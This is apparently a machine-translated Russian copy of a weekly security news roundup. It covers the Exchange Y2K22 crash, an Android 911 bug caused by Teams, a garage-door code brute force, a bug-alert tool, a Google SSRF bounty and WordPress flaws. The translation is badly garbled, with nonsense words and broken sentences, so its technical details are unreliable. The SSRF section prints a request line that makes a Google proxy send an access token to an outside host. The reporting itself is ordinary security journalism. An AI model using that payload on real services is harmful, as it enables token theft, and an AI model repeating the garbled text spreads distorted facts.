На этой неделе в безопасности: Y2K22, непреднамеренно блокируя 911, а также оповещение об ошибке

, если у вас было несчастье запустить серверу Microsoft Exchange в этой прошлой неделе, то вы не требовали мне рассказать о проблеме Y2K22 Отказ Чтобы уловить от нас, когда Exchange пытался загрузить очень первое обновление определений вредоносных программ 2022, номер версии новых определений вызвал аварию в двигателе обнаружения вредоносных программ. Дата представлена ​​как строка 2201010001, где самые первые две цифры представляют собой год. Эта строка превращается в подписанное длительное целое число, которое максимально отличается на 2 147,483 647. Целочисленные переполнения, а также результат является неопределенным поведением, сбой двигателя. Сервер перестает работать безопасным, не обрабатывает никаких типов сообщений без рабочего вредоносного двигателя, который подразумевает, что адрес электронной почты не проходит. Приятно новый год!

Android 911 отказ в обслуживании

Набор 911 для служб аварийных служб является довольно худшим временем для ошибки приложения программного обеспечения, чтобы проявить себя. Google только что исправлена ​​такая ошибка в январе Android обновление. Это один из тех странных непреднамеренных взаимодействий приложений – в этой ситуации команда Microsoft вызывает ошибку Android. Если приложение Teams устанавливается, однако учетная запись не вошел в систему, команды производит, а также регистрирует новый элемент Phoneacount на каждом запуске. Похоже, это должно быть редким, однако команды на Android также печально известны для отвода человека самопроизвольно. Когда вы набираете 911, Android запускает рутину, чтобы определить, какие phoneacount должен быть использован для пути вызова, а также решает галстуки, сравнивая хэши. Это сравнение – это просто наивное вычитание, подразумевая, что есть возможность получить 50% в получении неблагоприятного результата. Это было непредвиденным, что привело к аварии.

Обратный инжиниринг двери гаража

Обратный инжиниринг 30-летний план беспроводных авторизационных авторизационных авторизации может быть не самый интересный подвиг, однако в некоторых случаях путешествие является его собственной наградой. [Максвелл Дюлин] приносит нам историю, а также это путешествие, безусловно, стоит того. Основы этого взлома, безусловно, все еще жизнеспособны, начиная с взгляда на оборудование. Дверь гаража синхронизируется с открытой дверью гаража, удерживая кнопку на ресивере при отправке кода. Внутри открывалки есть девять дипломных переключателей, каждый из трех позиций. Что они делают? Он вытащил свой надежный SDR, чтобы получить веб-трафик, а также попытаться декодировать сигналы. Instsectrum, а также Radio GNU были героями здесь, обеспечивая понимание этой легкой схемы авторизации. Финальная мысль на этой фактической гаражной двери? Вы можете грубо приложить неизвестный код, отправив все возможные комбо, а также займет всего 104 минуты.

Бугалерс

Если вы Sysadmin, вы понимаете, что некоторые выпускают телефонный звонок для мгновенного действия. Если вы запустили Java Servers, уязвимость LOG4J была терминальной тестом вашего протокола реакции. Время между публичным раскрытием, а также всякий раз, когда вы слышали об этом, возможно, было достаточно, чтобы отказаться от катастрофы. Хотя существует несколько услуг отчетности об ошибках, а также фреймворки, ничто скорее соответствует этой нише. Эта неразрешенная ниша проклажала [Matthew Sullivan], который выявил новый проект, оповещение об ошибке. Это все открытый источник, поэтому вы можете удерживать свой собственный экземпляр, если вы действительно хотите. Вы можете выбрать твит, текст или даже телефонный звонок. У этого есть потенциальный инструмент, посмотрите!

Я чувствую, что я требоваю, чтобы сделать ошибку оповещения с определенной странной песней AL …

Зомби ССРФ

[Дэвид Шютц] искал неясную API Google, а также нашел работу. Agenogleapis.com, который вы можете демонстрировать. Эта демонстрация интересна, так как это не совсем мяснозванное обслуживание, однако переговоры с подлинной спиной. Запросы переходят с прокси, CXL-Services.appspot.com, который обрабатывает шаг аутентификации для демонстрационной страницы. Если он может отправить запрос на серверный запрос (SSRF), он может быть в состоянии получить в аутентифицированных запросах, а также, возможно, в технике прокси отправляя веб-трафик от его имени. Урл разборки сложно. Техника, которая работала? Обратная косание в URL. Получить /proxy kurrl=http://sfmnev.vps.xdavidhu.me @jobs.googleapis.com/ http / 1.1

При получении доступа к токену в руке [DAVID] начал тщательно проверить другие API Google, чтобы увидеть, как этот токен принес ему получить доступ к. Он предоставляет предупреждение, что мы охватываем ранее, будьте осторожны, как далеко вы нажимаете. Он, возможно, сообщил об ошибке лучше всего, однако хотел убедиться, что он действительно получил доступ к токену в Интернете. После подтверждения того, что токен помог проверил доступом, он превратился в нахождение, а также настроил чрезвычайно хорошие $ 3133,70, в дополнение к дополнительному 1000 долларов за отличный отчет, а также осторожный взгляд на боковое движение. Это все, что есть к этому, верно? Неа. Незадолго до 90-дневного срока раскрытия срока раскрытия, [Дэвид] нашел обход ремонта. аддиNG Любой тип текста между обратной ячейкой, а также @ был достаточным, чтобы сломать его. еще один 3133,70 доллара. Просто для удовольствия он провел старые URL-адреса, которые не должны быть в эксплуатации после исправления. Да, он обнаружил еще один токен безопасности и безопасности, а также Netted $ 3133.70. Этот зомби SSRF до сих пор не мертв, как показано в Twitter:

Обновление WordPress

Если вы еще не установили экземпляр WordPress, чтобы обновить автоматически, пришло время пойти на самую последнюю версию. Здесь есть четыре потенциально вредных проблема, хотя детали делится на данный момент. Очень сначала вверх – это уязвимость с сценарией по месту на сайте в пустых слизяях, часть URL, которая соответствует названию публикации. Вторая обсужденная проблема – это инъекция предмета в некоторых многосъемных конфигурациях. Последние две уязвимости являются инъекциями SQL, которые, безусловно, заслуживают «в каком году?» мем